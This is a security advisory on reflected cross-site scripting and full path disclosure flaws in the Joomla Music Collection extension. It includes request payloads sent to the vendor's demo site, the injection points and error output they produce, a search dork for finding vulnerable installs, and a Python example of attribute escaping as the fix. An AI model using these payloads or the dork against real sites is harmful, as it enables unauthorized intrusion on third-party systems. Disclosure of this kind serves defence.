Joomla Music Collection XSS & FPD

2014.01.25
Credit: Smash_
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

#Title: Joomla Music Collection - XSS & FPD
#Version: 2.4.0 (Latest ATM) - extensions.joomla.org/extensions/multimedia/multimedia-players/audio-players-a-gallery/7750
#Dork: inurl:com_muscol
#Vendor: JoomlaThat! - www.joomlathat.com
#Date: 01.24.2014
#Contact: smash[at]devilteam.pl

1. Cross Site Scripting - Search Bar

Request:
GET /?searchword=666"%20onmouseover=alert(666)%20bad="&genre_id=&type_id=&tag_id=&option=com_muscol&search=albums&view=search&Itemid=126&orderby=year_asc&limit=20&limitstart=0 HTTP/1.1
Host: www.joomlathat.com

Injection point:
</span><input type="text" class="inputbox " name="searchword" id="keyword_search_input" size="13" maxlength="255" placeholder="Search songs..." value="666" onmouseover=alert(1) bad=""/>

2. Full Path Disclosure - Download this song

Request:
www.joomlathat.com/index.php?option=com_muscol&view=file&format[]=raw&id=666&Itemid=666

Response:
Fatal error: Call to undefined method JException::setModel() in /home/joomlathat/www/libraries/joomla/application/component/controller.php on line 683

3. Full Path Disclosure - Search Bar

Request:
www.joomlathat.com/demo/music-collection/search?search=666&genre_id=

Response:
Fatal error: Call to a member function getListFooter() on a non-object in /home/joomlathat/www/components/com_muscol/views/search/tmpl/common.php on line 27

4. Cross Site Scripting - Songs Page

Request:
www.joomlathat.com/demo/music-collection/b/b-b-king-eric-clapton/songs/page-2%22%3ESUP%3C!--

Injection point (line 223):
<meta property="og:url" content="http://www.joomlathat.com/demo/music-collection/b/b-b-king-eric-clapton/songs/page-2">SUP<!--" />
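The root cause behind findings 1 and 4 is the same: a request parameter is written into a double-quoted HTML attribute without attribute-context encoding, so a literal " in the input closes the attribute and whatever follows becomes new attributes (or, for the og:url meta tag, a new tag). The following Python is an added illustration, not code from the component or from the advisory author; the two render functions and the crude attribute scanner are hypothetical stand-ins for the PHP template, and the payload is the URL-decoded searchword value from finding 1.

```python
import html
import re

# Constructed sample: the searchword value from finding 1 of the advisory,
# URL-decoded (searchword=666"%20onmouseover=alert(666)%20bad=").
PAYLOAD = '666" onmouseover=alert(666) bad="'

# Attributes the search box is meant to carry (hypothetical, trimmed down
# from the tag shown at the injection point).
EXPECTED_ATTRS = {"type", "name", "value"}


def render_search_box_unsafe(searchword: str) -> str:
    """Vulnerable pattern: the raw parameter lands inside a double-quoted
    attribute, so a '"' in the input terminates the attribute early."""
    return f'<input type="text" name="searchword" value="{searchword}"/>'


def render_search_box_safe(searchword: str) -> str:
    """Hardened form: encode for the HTML attribute context. html.escape with
    quote=True turns '"' into &quot; (and & < > into entities), so the value
    can no longer break out of the attribute it sits in."""
    escaped = html.escape(searchword, quote=True)
    return f'<input type="text" name="searchword" value="{escaped}"/>'


# Deliberately simple attribute scanner: name=value pairs where the value is
# either a double-quoted string or a bare token. It only shows which attribute
# names a browser would end up seeing on the rendered tag.
ATTR_RE = re.compile(r'(\w+)=("[^"]*"|[^\s>]+)')


def attribute_names(tag: str) -> list[str]:
    """Attribute names in the order they appear on the tag."""
    return [m.group(1) for m in ATTR_RE.finditer(tag)]


def injected_attributes(tag: str) -> set[str]:
    """Attributes not present in the template, i.e. smuggled in through the
    parameter. Empty for a correctly encoded tag."""
    return set(attribute_names(tag)) - EXPECTED_ATTRS


if __name__ == "__main__":
    for label, render in (("unsafe", render_search_box_unsafe),
                          ("safe", render_search_box_safe)):
        tag = render(PAYLOAD)
        print(f"{label}: {tag}")
        print(f"  injected attributes: {sorted(injected_attributes(tag)) or 'none'}")
```

For the full path disclosure findings the fix is on the PHP side rather than in the template: keep display_errors off in production so fatal errors are logged, not echoed with filesystem paths.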

References:

http://extensions.joomla.org/extensions/multimedia/multimedia-players/audio-players-a-gallery/7750
http://devilteam.pl/

